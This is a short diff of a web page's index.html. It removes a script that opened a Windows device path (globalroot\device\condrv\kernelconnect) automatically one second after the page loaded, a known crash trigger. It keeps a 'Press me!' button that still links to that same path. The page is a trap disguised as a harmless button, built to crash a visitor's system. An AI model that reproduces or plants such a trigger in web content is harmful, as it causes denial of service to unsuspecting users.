--- a/index.html
+++ b/index.html
@@ -12,11 +12,6 @@
     </head>
     
     <body>
-      <a class="button" href="file:\\.\globalroot\device\condrv\kernelconnect">Press me!</a>
-      <script>
-          setTimeout(function(){
-            window.open("file:\\.\globalroot\device\condrv\kernelconnect"); 
-          }, 1000)
-      </script>
+      <a class="button" href=" \\.\globalroot\device\condrv\kernelconnect">Press me!</a>
     </body>
     </html>
